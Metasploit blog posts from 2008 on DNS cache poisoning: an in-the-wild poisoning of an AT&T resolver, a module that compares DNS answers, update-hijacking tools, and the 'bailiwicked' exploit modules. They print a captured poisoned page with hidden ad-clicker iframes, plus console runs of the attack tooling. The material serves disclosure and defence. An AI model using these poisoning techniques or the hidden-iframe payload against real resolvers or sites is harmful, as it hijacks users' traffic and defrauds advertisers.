Skip navigation
All Places > Metasploit > Blog > 2008 > July
2008

DNS Attacks in the Wild

Posted by rapid7-admin Jul 29, 2008

Originally Posted by hdm

 

 

In a recent conversation with Robert McMillan (IDG), I described a in-the-wild attack against one of AT&T's DNS cache servers, specifically one that was configured as an upstream forwarder for an internal DNS machine at BreakingPoint Systems. The attackers had replaced the cache entry for www.google.com with a web page that loaded advertisements hidden inside an iframe. This attack affected anyone in the Austin, Texas region using that AT&T Internet Services (previously SBC) DNS server. The attack itself was not malicious, did not load malware, and from an operational  standpoint, had zero impact. I contacted the ISP, worked with our IT folks to switch forwarding services, and wrote a cache auditing tool. I found the "wild" attack interesting, so in a conversation with Robert McMillan, I brought up the incident and forwarded the associated logs and notes. Shortly after our conversation, Mr. McMillan published an article with a sensationalist title, that while containing most of the  facts, attributed a quote to me that I simply did not say. Specifically, `"It's funny," he said. "I got owned."`

 

Most of the facts of the article are correct. I have no problem detailing the attack, how it worked, and how we detected and resolved it. I am careful about the wording, because I want to be clear that while this type of attack can be serious, in this case it was a five minute annoyance that was designed as a revenue generator for the folks who launched it (click-through advertisement revenue). No systems were been compromised, no data was stolen, and most importantly, the target of the attack was the ISP, not the company that I work for. Stating that my company was "compromised" leads the reader to believe that there was some sort of security breach, which is reinforced by the fabricated quote. Mr. McMillan has since published a correction, but by the time this trickles down to all of the IDG publications, the damage will have been done. At this time (09:00 CST), the correction is posted, but the articles themselves have not been updated.

 

To add some content to my whining, I have included further details on the actual attack. The DNS server in question was dns1.austtx.sbcglobal.net (151.164.20.201). This system accepted recursive requests from anywhere (not just subscribers) and is the default DNS server for anyone who purchased SBC Internet Services (in our case, a T1 line that was our primary until our fiber was run). Internally, we use two DNS servers, one going out the fiber, other going out the T1 as backup. Early Tuesday morning, some of the friends and family members of BreakingPoint employees noticed that the iGoogle web page was returning a 404 from their home internet connections. Once our folks got to the office, they noticed that every once in a while, they could also reproduce it from within our network. Digging into it, we discovered that one of our internal DNS servers was still using SBC/AT&T as an upstream forwarder and that this server was returning the wrong results for www.google.com:

 

$ dig +short -t a www.google.com @151.164.20.201
www.l.google.com.
67.222.48.43

 

When querying the same address from the other DNS server, we saw the correct results:
$ dig +short -t a www.google.com @InternalDNS
www.l.google.com.
64.233.167.99
64.233.167.104
64.233.167.147

 

Requesting the main web page from the "poison" www.google.com server returned a very different response from the real Google server. This server was returning four iframes, one of which showed a fake version of the Google web site, the other three loaded automated ad-clickers from three other compromised servers.

 

$ echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | nc 67.222.48.43 80
HTTP/1.1 200 OK
Date: Tue, 29 Jul 2008 15:30:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.6
Transfer-Encoding: chunked
Content-Type: text/html

 

161

 

<iframe width=100% height=100% frameborder=0 src="http://72.14.205.99/"></iframe>
<iframe width=0 height=0  frameborder=0 src="http://www.ramhost.org/ads.php"></iframe>
<iframe width=0 height=0  frameborder=0 src="http://www.medicaltechnic.net/ads.php"></iframe>
<iframe width=0 height=0  frameborder=0 src="http://www.funreport.net/ads.php"></iframe>

 

We changed the upstream forwarder for our internal DNS to point to a patched server (the ubiquitous BBN 4.2.2.x systems (OpenDNS has issues[1]), contacted the ISP, and wrote a cache validator that does not require host access to the DNS server (see the previous post for more information on that). The lesson -- even if your own DNS servers are patched, make sure none of those systems use an upstream DNS that has not. Since we contacted the ISP, this particular DNS server was taken offline. I found a list of regional SBC DNS servers and prodded them with the porttest.dns-oarc.net service. The end result was that of the 19 servers still online, 12 of them are still using static source ports, and each of these can be reached by anyone on the Internet. I wonder if they are waiting on ISC to fix BIND's performance problems.

 

-HD

 

1. OpenDNS returns poisoned records. Intentionally poisoned. For example, www.google.com points to a SQUID cache server run by OpenDNS, not the real google.com server. While I admire a service that improves security, I wonder about the impact of diverting private communications through their web cache servers. Does Google's privacy statement apply to the monitoring of traffic by OpenDNS -- I don't think so.

 

$ dig +short -t a www.google.com @208.67.222.222
google.navigation.opendns.com.
208.69.32.231
208.69.32.230

 

$ HEAD 208.69.32.231
200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Wed, 30 Jul 2008 06:49:13 GMT
Via: 1.0 .:80 (squid)

Originally Posted by hdm

 

 

After seeing the SBC/ATT server for Austin get poisoned, serve up advertisements, and eventually get taken offline, I decided to add a module to compare DNS results between two servers. In the following example, the ".gov" TLD has been poisoned with the bailiwicked_domain Metasploit module:

 

msf > use auxiliary/spoof/dns/compare_results

 

msf auxiliary(compare_results) > set BASEDNS 4.2.2.3
BASEDNS => 4.2.2.3

 

msf auxiliary(compare_results) > set TARGDNS poisoned.server
TARDNS => poisoned.server

 

msf auxiliary(compare_results) > set NAMES www.fbi.gov
NAMES => www.fbi.gov

 

msf auxiliary(compare_results) > run
[*] Comparing results between 4.2.2.3 and poisoned.server...
[*] Querying servers for www.fbi.gov...
[*] Analyzing results for 1 entries...
[*]   - www.fbi.gov A 64.86.183.120
[*]   - www.fbi.gov A 64.86.183.99
[*]   - www.fbi.gov CNAME a33.g.akamai.net
[*]   - www.fbi.gov CNAME fbi.edgesuite.net
[*]   + www.fbi.gov A 1.3.3.7
[*] Auxiliary module execution completed

Originally Posted by hdm

 

 

Francisco Amato of Infobyte Security Research just announced ISR-evilgrade v1.0.0, a toolkit for exploiting products which perform online updates in an insecure fashion. This tool works in conjunction with man-in-the-middle techniques (DNS, ARP, DHCP, etc) to exploit a wide variety applications. The demonstration video uses the CAU/Metasploit DNS exploit in conjunction with the Sun Java update mechanism to execute code on a fully patched Windows machine. For more information, see the README and slide deck. The first release includes exploits for Sun Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar, DAP, Notepad++, and Speedbit

Originally Posted by hdm

 

 

The bailiwicked modules (host and domain) were updated today to include the ability to predict the time window between the outgoing request from the target nameserver and the response from the real nameserver(s). This measurement is used to tune the number of spoofed replies sent by the exploit. The result is a big increase in exploit reliability, especially when the target domain has a ton of nameservers (Yahoo has eight) or changes its responsiveness during the test (BIND tends to slow down when it has a full cache). The new self-tuning code is activated with the XIDS option is set to '0', which is now the default. FreeBSD and Mac OS X support are still in the works, but should be functional sometime this weekend. The timing analysis feature can also be access through a new command ('racer'). In the examples below, the first command tests the timing between the nameserver at 192.168.0.2 and the metasploit.com DNS servers. The second command tests the timing between the nameserver 4.2.2.3 (a public DNS server) and the metasploit.com DNS servers. You can see by the results that the timing differences are significant:

 

msf auxiliary(bailiwicked_host) > racer 192.168.0.2 metasploit.com
[*]   race calc: 50 queries | min/max/avg time: 0.05/0.23/0.09 | min/max/avg replies: 6/121/49

 

msf auxiliary(bailiwicked_host) > racer 4.2.2.3 metasploit.com
[*]   race calc: 50 queries | min/max/avg time: 0.02/0.17/0.05 | min/max/avg replies: 1/29/6

 

In the first case (192.168.0.2), the average number of queries we can send before the real server replies is around 49, which means about 80 fake responses. In the second example, the average is only 6, which means about 12 fake responses. To be conservative, these modules take the average, multiple it by 1.5, then divide it by the number of nameservers. This leads to a fairly accurate timing estimate and quicker attacks.

BailiWicked

Posted by rapid7-admin Jul 24, 2008

Originally Posted by I)ruid

 

 

If you haven't already noticed by now, we've recently published two modules which exploit Kaminsky's DNS cache poisoning flaw.  I'll get to those in a second, but first a word about disclosure.

 

In the short time that these modules have been available, I've received personal responses from a LOT of people, spanning the spectrum from "OMG how could you do this to the Internet users???" to "Great work, now I know what I'm up against...  We need more open researchers like you guys."  In all honesty, I was content to wait for Kaminsky's presentation at BlackHat before coding these up, because I didn't have the details and was too busy to go figure them out.  But once public speculation started nailing the issue (form your own conclusions on whether the speculation itself was "responsible" or not), and then the accidental leak of the full details, followed by Kaminsky's describing the bug himself via a story on how he found it in an interview shortly thereafter, working exploits being created was only a (likely, short) matter of time.  I was personally aware of multiple exploits in various levels of development before, during, and after HD and I wrote ours, so we felt at this point publishing working exploit code was fair game.  We hope that all of you who were unfortunate enough to not have the vulnerability information shared with you originally all enjoy testing your nameserver implementations and products, and get your own patches out (or in the consumer case, applied) posthaste.

 

So, on to our new modules.  There's no reason to rehash the deep tech regarding packet formats and spoofing techniques, as most of the speculation linked above was correct, and the original leak has been mirrored just about everywhere.  In short, the way this flaw works is that it combines two previously known but somewhat mitigated flaws to achieve success:

 

The first flaw is that since DNS (over UDP) is connectionless, it can easily be spoofed.  The original primary mitigation against this was to make use of a 16-bit transaction ID which is used to correlate requests and replies that the attacker would have to guess in order to correctly spoof a reply packet.  This makes spoofing harder, but not an insurmountable task; you just need to be able to send a whole lot of packets to eventually get one right at match the transaction ID chosen for the request packet.

 

The second flaw was that additional records would be inserted into the cache which were included in replies from another nameserver.  This is core protocol functionality, however the original problem was somewhat mitigated by creating the in-bailiwick constraints that essentially limits the domain space for additional records that could be sent in the replies to hostnames from a given domain.  Sounds reasonable; this prevents nameservers from doing malicious things to records in domains that they weren't queried for or aren't authoritative for, while still allowing nameservers who are authoritative for a domain to update the records they need to.

 

When you combine the attacks for these two flaws however, and introduce nameserver query recursion, an attacker can essentially cause the target nameserver to make as many queries as the attacker wants while also pretending to be the authoritative nameserver and spoofing the responses, achieving the birthday attack against the transaction ID and successfully updating the nameserver record for a domain to point to a malicious nameserver address.  You can also use this trick to inject cache entries for individual hostname records as long as those hostnames are both not already cached, and also in-bailiwick.

 

The two Metasploit modules which implement these attacks are "DNS BailiWicked Host Attack" for injecting individual uncached host records into the target nameserver's cache, and "DNS BailiWicked Domain Attack" for replacing a target domain's nameserver records in a target nameserver's cache.  Currently these must be run from the MSF "trunk" development branch, as they rely on Net::DNS and raw sockets functionality which currently only exists in the development branch for MSF.  The raw sockets code also currently only works when running MSF under Linux.

Filter Blog

By date: By tag: